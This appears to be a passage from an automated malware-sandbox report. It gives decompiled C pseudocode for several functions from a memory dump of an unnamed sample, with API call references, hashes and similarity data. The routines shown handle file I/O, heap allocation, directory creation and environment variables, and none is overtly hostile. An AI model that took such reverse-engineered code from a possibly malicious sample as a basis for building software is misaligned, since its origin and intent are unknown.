0x00401ca6
0x00401cac
0x00401cb1
0x00401cb2
0x00401cb4
0x00401cb9
0x00401cba
0x00401cbc
0x00401cc1
0x00401cc2
0x00401cc4
0x00401cc9
0x00401cca
0x00401ccb
0x00401cd1
0x00401cd6
0x00401cd7
0x00401cd9
0x00401cde
0x00401ce9
0x00401cee
0x00401cf6
0x00401cfb
0x00401d03
0x00401d07
0x00401d08
0x00401d0d
0x00401d11
0x00401d12
0x00401d17
0x00401d1f
0x00401d24
0x00401d2a
0x00401d2f
0x00401d30
0x00401d32
0x00401d37
0x00401d38
0x00401d3a
0x00401d3f
0x00401d40
0x00401d42
0x00401d47
0x00401d57
0x00401d5c
0x00401d5c
0x00401d64
0x00401d68
0x00401d69
0x00401d6f
0x00401d74
0x00401d75
0x00401d77
0x00401d7c
0x00401d8c
0x00401d91
0x00401d96
0x00401d9a
0x00401d9e
0x00401d9f
0x00401da4
0x004011a0
0x004011a0
0x004011a5
0x004011aa
0x004011b5
0x004011ba
0x004011bf
0x004011c4
0x004011c9
0x004011d3
0x004011dd
0x00401da6
0x00401da6
0x00401dab
0x00401dab
0x00401dad
0x00401db0
0x00401db5
0x00401db8
0x00401dbd
0x00401dc9
0x00401dce
0x00401dd2
0x00401dd9
0x00401ddb
0x00401de0
0x00401de2
0x00401ded
0x00401df2
0x00401df3
0x00401df5
0x00401dfa
0x00401e06
0x00401e0c
0x00401e0d
0x00401e0d
0x00401de0
0x00401e26
0x00401e2f
0x00401e38
0x00401e41
0x00401e4a
0x00401e4f
0x00401e53
0x00401e54
0x00401e54
0x00401da4

APIs

Part of subcall function 0040DF60: TlsGetValue.KERNEL32(0000001B,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,0041606C,00000008,0000000C), ref: 0040DF77

Part of subcall function 0040DE20: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE26
Part of subcall function 0040DE20: TlsGetValue.KERNEL32(0000001B), ref: 0040DE35
Part of subcall function 0040DE20: SetLastError.KERNEL32(?), ref: 0040DE4B

Part of subcall function 00409638: GetModuleFileNameW.KERNEL32(00000000,00000104,00000104,00000000,?,?,?,00401BC5,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 00409654
Part of subcall function 00409638: wcscmp.MSVCRT ref: 00409662
Part of subcall function 00409638: memmove.MSVCRT ref: 0040967A

Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402FDE,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189

LoadLibraryExW.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00417040,00000000), ref: 00401BCD
EnumResourceTypesW.KERNEL32 ref: 00401BEA
FreeLibrary.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00401BF2

Part of subcall function 0040DFC0: wcslen.MSVCRT ref: 0040DFD7

Part of subcall function 0040DE60: TlsGetValue.KERNEL32(0000001B,00000000,00000000), ref: 0040DE6C
Part of subcall function 0040DE60: RtlAllocateHeap.NTDLL(02790000,00000000,?), ref: 0040DE99

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: Value$ErrorLastLibrary$AllocateEnumFileFreeHeapLoadModuleNameResourceTypesmemmovewcscmpwcslen
String ID:
API String ID: 983379767-0
Opcode ID: 4ad9618a39c96ebc7cc08c76ef6dd36292b015dc4290505fe387b7f3c1c86b5b
Instruction ID: 3462f3606e8cbb1e1a4d79c74de0940f317b4d1ea5cf6404f74aab9d4bf66b3f
Opcode Fuzzy Hash: 4ad9618a39c96ebc7cc08c76ef6dd36292b015dc4290505fe387b7f3c1c86b5b
Instruction Fuzzy Hash: 4251F7B59047006AE6007BF2DD86E7F66AEDBD4718F10883FB5407D0D2CA3C8C5966AD

Uniqueness

Uniqueness Score: -1.00%

Function 0040AFC0, Relevance: 4.6, APIs: 3, Instructions: 102
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E0040AFC0(long __edx, void** _a4, void* _a8, long _a12) {
				long _v4;
				long _v8;
				long _v12;
				void* _t36;
				void* _t38;
				void* _t45;
				void* _t49;
				long _t58;
				void* _t63;
				long _t69;
				void** _t75;

				_t75 = _a4;
				_v12 = 0;
				if(_t75[7] != 0) {
					return 0;
				} else {
					if(_t75[5] == 1) {
						_t58 =  ~(_t75[3]);
						asm("cdq");
						_v8 = _t58;
						_v4 = __edx;
						SetFilePointer( *_t75, _t58,  &_v4, 1); // executed
						_t75[5] = 0;
						_t75[3] = _t75[2];
					}
					_t36 = _t75[3];
					_t69 = _a12;
					if(_t36 <= _t69) {
						E0040A9E0(_t75);
						_t38 = _t75[2];
						if(_t69 < _t38) {
							_push(_t69);
							_push(_a8);
							_t63 = _t75[1] - _t75[3] + _t38;
							goto L8;
						} else {
							WriteFile( *_t75, _a8, _t69,  &_v12, 0); // executed
							return _v12;
						}
					} else {
						_t63 = _t75[2] + _t75[1] - _t36;
						_t45 = _t69 - 1;
						if(_t45 == 0) {
							 *_t63 =  *_a8;
							_t75[3] = _t75[3] - _t69;
							return _t69;
						} else {
							_t49 = _t45 - 1;
							if(_t49 == 0) {
								 *_t63 =  *_a8;
								_t75[3] = _t75[3] - _t69;
								return _t69;
							} else {
								if(_t49 == 2) {
									 *_t63 =  *_a8;
									_t75[3] = _t75[3] - _t69;
									return _t69;
								} else {
									_push(_t69);
									_push(_a8);
									L8:
									memcpy(_t63, ??, ??);
									_t75[3] = _t75[3] - _t69;
									return _t69;
								}
							}
						}
					}
				}
			}

0x0040afc4
0x0040afc8
0x0040afd4
0x0040b0cd
0x0040afda
0x0040afde
0x0040afe9
0x0040afeb
0x0040aff0
0x0040aff4
0x0040aff8
0x0040b001
0x0040b008
0x0040b008
0x0040b00b
0x0040b00f
0x0040b015
0x0040b089
0x0040b08e
0x0040b093
0x0040b0bb
0x0040b0bc
0x0040b0c0
0x00000000
0x0040b095
0x0040b0a3
0x0040b0b2
0x0040b0b2
0x0040b017
0x0040b01d
0x0040b021
0x0040b022
0x0040b079
0x0040b07d
0x0040b085
0x0040b024
0x0040b024
0x0040b025
0x0040b063
0x0040b068
0x0040b070
0x0040b027
0x0040b02a
0x0040b04d
0x0040b051
0x0040b059
0x0040b02c
0x0040b02c
0x0040b02d
0x0040b031
0x0040b032
0x0040b03c
0x0040b044
0x0040b044
0x0040b02a
0x0040b025
0x0040b022
0x0040b015

APIs

SetFilePointer.KERNELBASE(?,?,?,00000001), ref: 0040AFF8
memcpy.MSVCRT ref: 0040B032

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: FilePointermemcpy
String ID:
API String ID: 1104741977-0
Opcode ID: 0eefa4f874f6ecccfca5fc54179e78147f46ecb2304ab69a4aa20b4cccdc9a3e
Instruction ID: ace082a42c8b9570e8fa48c2980c6e4681abbcae92d9a1b023345ff456592002
Opcode Fuzzy Hash: 0eefa4f874f6ecccfca5fc54179e78147f46ecb2304ab69a4aa20b4cccdc9a3e
Instruction Fuzzy Hash: 4B313A392007009FC220DF29D844E5BB7E5EFD8714F04882EE59A97750D335E919CFA6

Uniqueness

Uniqueness Score: -1.00%

Function 0040AC70, Relevance: 4.6, APIs: 3, Instructions: 76
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040AC70(void* __ebx, void* _a4, WCHAR* _a8) {
				void* _t13;
				long _t16;
				long _t17;
				void* _t19;
				void* _t21;
				void* _t23;
				void* _t24;
				void* _t25;

				_t25 = _a4;
				_t23 = 0;
				_t24 = E0040D438( *0x41771c, _t25);
				if(_t24 == 0) {
					return 0;
				} else {
					_t13 = CreateFileW(_a8, 0xc0000000, 0, 0, 2, 0x80, 0); // executed
					_t21 = _t13;
					if(_t21 != 0xffffffff) {
						L3:
						if(_t21 == 0) {
							goto L10;
						} else {
							_t16 =  *0x41612c; // 0x1000
							if(_t16 == 0) {
								 *(_t24 + 4) = _t23;
							} else {
								 *(_t24 + 4) = HeapAlloc( *0x417008, 0, _t16);
							}
							 *_t24 = _t21;
							_t17 =  *0x41612c; // 0x1000
							 *(_t24 + 0xc) = _t23;
							 *(_t24 + 0x1c) = _t23;
							_t23 = _t24;
							 *(_t24 + 8) = _t17;
							 *((intOrPtr*)(_t24 + 0x14)) = 1;
							 *(_t24 + 0x18) = 2;
							if(_t25 != 0xffffffff) {
								_t23 = _t21;
							}
							if(_t23 == 0) {
								goto L10;
							}
						}
					} else {
						_t19 = CreateFileW(_a8, 0x40000000, 0, 0, 5, 0, 0); // executed
						_t21 = _t19;
						if(_t21 == 0xffffffff) {
							L10:
							if(_t25 != 0xffffffff) {
								_t24 = _t25;
							}
							E0040D3AA( *0x41771c, _t24);
						} else {
							goto L3;
						}
					}
					return _t23;
				}
			}

0x0040ac71
0x0040ac7e
0x0040ac85
0x0040ac89
0x0040ad3c
0x0040ac8f
0x0040aca3
0x0040aca9
0x0040acae
0x0040accc
0x0040acce
0x00000000
0x0040acd0
0x0040acd0
0x0040acd7
0x0040aced
0x0040acd9
0x0040ace8
0x0040ace8
0x0040acf0
0x0040acf2
0x0040acf7
0x0040acfa
0x0040acfd
0x0040acff
0x0040ad02
0x0040ad09
0x0040ad13
0x0040ad15
0x0040ad15
0x0040ad19
0x00000000
0x00000000
0x0040ad19
0x0040acb0
0x0040acbf
0x0040acc5
0x0040acca
0x0040ad1b
0x0040ad1e
0x0040ad20
0x0040ad20
0x0040ad29
0x00000000
0x00000000
0x00000000
0x0040acca
0x0040ad34
0x0040ad34

APIs

Part of subcall function 0040D438: EnterCriticalSection.KERNEL32(00000020,00000000,?,00000000,0040AD75,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000), ref: 0040D443
Part of subcall function 0040D438: LeaveCriticalSection.KERNEL32(00000020,?,00000000,0040AD75,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0040D4BE

CreateFileW.KERNELBASE(00000001,C0000000,00000000,00000000,00000002,00000080,00000000,00000001,00000000,?,?,?,0040474F,FFFFFFFF,?,00000000), ref: 0040ACA3
CreateFileW.KERNELBASE(00000001,40000000,00000000,00000000,00000005,00000000,00000000,?,?,?,0040474F,FFFFFFFF,?,00000000,00000000,00000000), ref: 0040ACBF
HeapAlloc.KERNEL32(00000000,00001000,?,?,?,0040474F,FFFFFFFF,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00403D71), ref: 0040ACE2

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateCriticalFileSection$AllocEnterHeapLeave
String ID:
API String ID: 49537883-0
Opcode ID: 4dd531b9fa248f024298d31622ac81a62092c3937c8fe5ab716ac7b1fb55e9df
Instruction ID: f6fed0e380c2868238a2ed1f5ecffa77528f81bfe2ad71e922a363fc64bec02a
Opcode Fuzzy Hash: 4dd531b9fa248f024298d31622ac81a62092c3937c8fe5ab716ac7b1fb55e9df
Instruction Fuzzy Hash: F821CF31200700ABD3305B2AAC48F57BEA9EFC5B64F11863EF565A36E0D6359815CB29

Uniqueness

Uniqueness Score: -1.00%

Function 0040DE60, Relevance: 4.6, APIs: 3, Instructions: 53
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040DE60(void** _a4, intOrPtr _a8) {
				unsigned int _v8;
				intOrPtr* _v12;
				long _t19;
				void* _t23;
				void* _t26;
				void* _t27;
				void* _t41;
				void* _t46;

				_t19 =  *0x416170; // 0x1b
				_v12 = TlsGetValue(_t19);
				_v8 =  *((intOrPtr*)(_v12 + 8)) - _a8;
				if( *_a4 != 0) {
					_t41 =  *0x417720; // 0x2790000
					_t23 = RtlReAllocateHeap(_t41, 0,  *_a4, _v8 + 0xa); // executed
					 *_a4 = _t23;
				} else {
					_t46 =  *0x417720; // 0x2790000
					_t27 = RtlAllocateHeap(_t46, 0, _v8 + 0xa); // executed
					 *_a4 = _t27;
				}
				_t26 = E0040E300( *_v12 + _a8,  *_a4,  *_v12 + _a8, _v8 >> 1);
				 *((intOrPtr*)(_v12 + 8)) = _a8;
				return _t26;
			}

0x0040de66
0x0040de72
0x0040de7e
0x0040de87
0x0040deb5
0x0040debc
0x0040dec5
0x0040de89
0x0040de92
0x0040de99
0x0040dea2
0x0040dea2
0x0040dedc
0x0040dee7
0x0040deed

APIs

TlsGetValue.KERNEL32(0000001B,00000000,00000000), ref: 0040DE6C
RtlAllocateHeap.NTDLL(02790000,00000000,?), ref: 0040DE99
RtlReAllocateHeap.NTDLL(02790000,00000000,?,?), ref: 0040DEBC

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap$Value
String ID:
API String ID: 2497967046-0
Opcode ID: f865e40a7b47dc49b25cd0656b7d544d8748bc79d9d02905389b3cc1b6fb08eb
Instruction ID: e6d91f3b09335801e5746b2964150cf116aaa33277573073d0b775b4e860d931
Opcode Fuzzy Hash: f865e40a7b47dc49b25cd0656b7d544d8748bc79d9d02905389b3cc1b6fb08eb
Instruction Fuzzy Hash: E511B974A00208EFCB04DF98D894EAABBB6FF88315F10C559E9099B354D735AA41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0040A665, Relevance: 4.5, APIs: 3, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A665(wchar_t* _a4) {
				short _v8;
				short _v528;
				WCHAR* _t18;
				int _t20;
				signed int _t23;

				if(_a4 == 0) {
					return 0;
				}
				wcsncpy( &_v528, _a4, 0x104);
				_v8 = 0;
				_t18 =  &(( &_v528)[wcslen( &_v528)]);
				while(_t18 >  &_v528) {
					_t23 =  *(_t18 - 2) & 0x0000ffff;
					if(_t23 == 0x20 || _t23 == 0x5c || _t23 == 0x2f) {
						_t18 =  &(_t18[0xffffffffffffffff]);
						continue;
					} else {
						break;
					}
				}
				 *_t18 = 0;
				_t20 = CreateDirectoryW( &_v528, 0); // executed
				return _t20;
			}

0x0040a672
0x00000000
0x0040a6dd
0x0040a683
0x0040a68a
0x0040a6a3
0x0040a6be
0x0040a6a8
0x0040a6af
0x0040a6bb
0x00000000
0x00000000
0x00000000
0x00000000
0x0040a6af
0x0040a6ca
0x0040a6d5
0x00000000

APIs

wcsncpy.MSVCRT ref: 0040A683
wcslen.MSVCRT ref: 0040A695
CreateDirectoryW.KERNELBASE(?,00000000), ref: 0040A6D5

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateDirectorywcslenwcsncpy
String ID:
API String ID: 961886536-0
Opcode ID: 40426c4a27e9655a37d458fcd41d9c62d4d21f52a2c09d6ab7b3f43a5b08421e
Instruction ID: 630a5c6db6187271ae83db4eaeb36511880b8bdc4cdf20ec5a399f16e344c0a7
Opcode Fuzzy Hash: 40426c4a27e9655a37d458fcd41d9c62d4d21f52a2c09d6ab7b3f43a5b08421e
Instruction Fuzzy Hash: 0F01DBB08113189BCB24DB64CC8DABA7378DF00300F6446BBE455E21D1E77A9AA4DB4A

Uniqueness

Uniqueness Score: -1.00%

Function 00408D8E, Relevance: 4.5, APIs: 3, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E00408D8E(void* __ecx) {
				intOrPtr _v8;
				void _v12;
				void* _t7;

				memset( &_v12, 0, 8);
				_v12 = 8;
				_t7 =  &_v12;
				_v8 = 0xb48;
				__imp__InitCommonControlsEx(_t7, __ecx, __ecx);
				__imp__CoInitialize(0); // executed
				return _t7;
			}

0x00408d9b
0x00408da3
0x00408daa
0x00408dad
0x00408db5
0x00408dbd
0x00408dc6

APIs

memset.MSVCRT ref: 00408D9B
InitCommonControlsEx.COMCTL32(00000008,00001000), ref: 00408DB5
CoInitialize.OLE32(00000000), ref: 00408DBD

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: CommonControlsInitInitializememset
String ID:
API String ID: 2179856907-0
Opcode ID: 5fe436f70463189401810c8ea8ae9fa3e8af9a379760f2b470c78f7c9900ce65
Instruction ID: 781e80edae316a95334d3837f50a89f25f26191aceb080d9ad1fe250ea93eb12
Opcode Fuzzy Hash: 5fe436f70463189401810c8ea8ae9fa3e8af9a379760f2b470c78f7c9900ce65
Instruction Fuzzy Hash: 3AE0E6B594030CBBDB409FD0DC0EF9D7B7CE704705F404565F50496181EBB596048B95

Uniqueness

Uniqueness Score: -1.00%

Function 00409860, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409860(WCHAR* _a4, WCHAR* _a8) {
				void* _t4;
				WCHAR* _t5;
				int _t6;

				if(_a4 != 0) {
					_t5 = _a8;
					if(_t5 == 0) {
						_t5 = 0x412024;
					}
					_t6 = SetEnvironmentVariableW(_a4, _t5); // executed
					return _t6;
				}
				return _t4;
			}

0x00409865
0x00409867
0x0040986d
0x0040986f
0x0040986f
0x00409879
0x00000000
0x00409879
0x0040987f

APIs

SetEnvironmentVariableW.KERNELBASE(02799B50,02799B50,00404434,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409879

Strings

$ A, xrefs: 0040986F

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: EnvironmentVariable
String ID: $ A
API String ID: 1431749950-1415209610
Opcode ID: 37dc1e281acc41e39155b599a3fd8d037edce4260b7102e0d6fe6300a43532c6
Instruction ID: 34676badedbb0a82c232a14336f7de5419c85f3fd2839d3c24d176d6e2709967
Opcode Fuzzy Hash: 37dc1e281acc41e39155b599a3fd8d037edce4260b7102e0d6fe6300a43532c6
Instruction Fuzzy Hash: 46C01231604201ABDB11AA16C908F6BBBE6EBA1384F01C43AB985D23B0D338CC90DB09

Uniqueness

Uniqueness Score: -1.00%

Function 0040AD60, Relevance: 3.1, APIs: 2, Instructions: 65
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040AD60(void* __ebp, void* _a4, WCHAR* _a8) {
				void* _t12;
				long _t15;
				long _t16;
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t22;

				_t18 = _a4;
				_t19 = 0;
				_t20 = E0040D438( *0x41771c, _t18);
				if(_t20 == 0) {
					return 0;
				} else {
					_t12 = CreateFileW(_a8, 0x80000000, 0, 0, 3, 0x80, 0); // executed
					_t22 = _t12;
					if(_t22 == 0xffffffff || _t22 == 0) {
						L9:
						if(_t18 != 0xffffffff) {
							_t20 = _t18;
						}
						E0040D3AA( *0x41771c, _t20);
					} else {
						_t15 =  *0x41612c; // 0x1000
						if(_t15 == 0) {
							 *(_t20 + 4) = 0;
						} else {
							_t17 = RtlAllocateHeap( *0x417008, 0, _t15); // executed
							 *(_t20 + 4) = _t17;
						}
						 *_t20 = _t22;
						_t16 =  *0x41612c; // 0x1000
						 *(_t20 + 0xc) = _t19;
						_t19 = _t20;
						 *(_t20 + 8) = _t16;
						 *((intOrPtr*)(_t20 + 0x14)) = 1;
						 *((intOrPtr*)(_t20 + 0x18)) = 2;
						 *((intOrPtr*)(_t20 + 0x1c)) = 1;
						if(_t18 != 0xffffffff) {
							_t19 = _t22;
						}
						if(_t19 == 0) {
							goto L9;
						}
					}
					return _t19;
				}
			}

0x0040ad61
0x0040ad6e
0x0040ad75
0x0040ad79
0x0040ae13
0x0040ad7f
0x0040ad93
0x0040ad99
0x0040ad9e
0x0040adf2
0x0040adf5
0x0040adf7
0x0040adf7
0x0040ae00
0x0040ada4
0x0040ada4
0x0040adab
0x0040adc0
0x0040adad
0x0040adb5
0x0040adbb
0x0040adbb
0x0040adc3
0x0040adc5
0x0040adca
0x0040adcd
0x0040adcf
0x0040add2
0x0040add9
0x0040ade0
0x0040adea
0x0040adec
0x0040adec
0x0040adf0
0x00000000
0x00000000
0x0040adf0
0x0040ae0b
0x0040ae0b

APIs

Part of subcall function 0040D438: EnterCriticalSection.KERNEL32(00000020,00000000,?,00000000,0040AD75,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000), ref: 0040D443
Part of subcall function 0040D438: LeaveCriticalSection.KERNEL32(00000020,?,00000000,0040AD75,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0040D4BE

CreateFileW.KERNELBASE(00000000,80000000,00000000,00000000,00000003,00000080,00000000,?,00000000,?,?,00000000,004033A4,00000000,00000000,00000000), ref: 0040AD93
RtlAllocateHeap.NTDLL(00000000,00001000,?,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000,00000000,00000800), ref: 0040ADB5

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$AllocateCreateEnterFileHeapLeave
String ID:
API String ID: 2608263337-0
Opcode ID: 90f7faf706f975316c83b07ac6ced370c6fd09a1887d2f170a25e0c4fd74ef8c
Instruction ID: cb55299900a1a52b407eca00395bc400cfc912b247b49f0a026709af4e8a3faf
Opcode Fuzzy Hash: 90f7faf706f975316c83b07ac6ced370c6fd09a1887d2f170a25e0c4fd74ef8c
Instruction Fuzzy Hash: 0411D031100300ABC2305F5AEC48F57BBAAEFC5761F11863EF5A5A26E0C77698558B69

Uniqueness

Uniqueness Score: -1.00%

Function 0040DB6A, Relevance: 3.1, APIs: 2, Instructions: 61
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040DB6A(signed int _a4, intOrPtr _a8, intOrPtr _a20) {
				void* _v0;
				intOrPtr _v4;
				void* _v8;
				void* _v12;
				void* _t19;
				long _t29;
				void* _t31;
				signed int _t33;
				void* _t34;
				intOrPtr _t35;
				intOrPtr _t36;
				void* _t38;
				void* _t39;

				_t36 = _a20;
				_t34 = 0;
				E0040DCBD(_v0);
				_t33 = _a4;
				if(_t33 > 0) {
					_t29 = _a4 * _t33 + 0x18;
					_t19 = RtlAllocateHeap( *0x417008, 0, _t29); // executed
					_t34 = _t19;
					if(_t34 != 0) {
						 *((intOrPtr*)(_t34 + 4)) = _v4;
						 *((intOrPtr*)(_t34 + 8)) = _a8;
						_t9 = _t29 - 0x18; // 0xffffffc5
						 *(_t34 + 0x10) = _t33;
						 *(_t34 + 0x14) = _a4;
						 *((intOrPtr*)(_t34 + 0xc)) = _t36;
						 *_t34 = 1;
						_t34 = _t34 + 0x18;
						 *(_t38 + 0x30) = _t34;
						memset(_t34, 0, _t9);
						_t39 = _t38 + 0xc;
						_v0 = _t34;
						_t37 = _a8;
						if(E00411744(_a8) != 0 && _t33 > 0) {
							_t31 = _t34;
							_t35 = _v4;
							do {
								E00411B6F(_t31, _t37);
								_t31 = _t31 + _t35;
								_t33 = _t33 - 1;
							} while (_t33 != 0);
							_t34 =  *(_t39 + 0x24);
						}
					}
				}
				return _t34;
			}

0x0040db6b
0x0040db71
0x0040db76
0x0040db7b
0x0040db81
0x0040db8f
0x0040db9a
0x0040dba0
0x0040dba4
0x0040dbae
0x0040dbb5
0x0040dbb8
0x0040dbbc
0x0040dbbf
0x0040dbc2
0x0040dbc5
0x0040dbcb
0x0040dbd1
0x0040dbd5
0x0040dbda
0x0040dbdd
0x0040dbe0
0x0040dbec
0x0040dbf2
0x0040dbf4
0x0040dbf8
0x0040dbfa
0x0040dbff
0x0040dc01
0x0040dc01
0x0040dc04
0x0040dc04
0x0040dbec
0x0040dc08
0x0040dc0e

APIs

Part of subcall function 0040DCBD: HeapFree.KERNEL32(00000000,-00000018,00000200,00000000,0040DB7B,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,0041607C,00417090,00000004), ref: 0040DCFE

RtlAllocateHeap.NTDLL(00000000,FFFFFFDD,?,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,0041607C,00417090,00000004,00000000,0041606C), ref: 0040DB9A
memset.MSVCRT ref: 0040DBD5

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocateFreememset
String ID:
API String ID: 2774703448-0
Opcode ID: b4b42cf12e6a71c38c390e7d4c2b16159ff475ec6d8ebd77654cc0985d18a278
Instruction ID: 4684dd51efb4be1c7f6cbbcd141334eab977ef2b41965c3d3424e441a95aa271
Opcode Fuzzy Hash: b4b42cf12e6a71c38c390e7d4c2b16159ff475ec6d8ebd77654cc0985d18a278
Instruction Fuzzy Hash: 8C117C729047149BC320DF49D840A4BBBE8FF98B50F05452EF989A7351D774EC04CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040E200, Relevance: 3.1, APIs: 2, Instructions: 52
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E200(signed int _a4, void* _a8) {
				void** _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				long _t32;
				void* _t44;
				void* _t45;

				_t32 =  *0x416170; // 0x1b
				_v8 = TlsGetValue(_t32);
				if(_a8 == 0xffffffff) {
					_a8 = _v8[2];
				}
				_v12 = _v8[2] + _a4 * 2;
				if(_v12 >= _v8[1] - 4) {
					_v8[1] = _v12 + 0x4000;
					_t44 =  *0x417720; // 0x2790000
					_t45 = RtlReAllocateHeap(_t44, 0,  *_v8, _v8[1] + 0xa); // executed
					 *_v8 = _t45;
				}
				_v16 =  *_v8 + _a8;
				_v8[2] = _a8 + _a4 * 2;
				return _v16;
			}

0x0040e206
0x0040e212
0x0040e219
0x0040e221
0x0040e221
0x0040e230
0x0040e23f
0x0040e24c
0x0040e261
0x0040e267
0x0040e270
0x0040e270
0x0040e27a
0x0040e289
0x0040e292

APIs

TlsGetValue.KERNEL32(0000001B,00001000,00000000,00000000), ref: 0040E20C
RtlReAllocateHeap.NTDLL(02790000,00000000,?,?), ref: 0040E267

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeapValue
String ID:
API String ID: 3894635346-0
Opcode ID: b65472d8892799a2ab790df46868f8da18113432f0cbb7547d7b3206bfd8583f
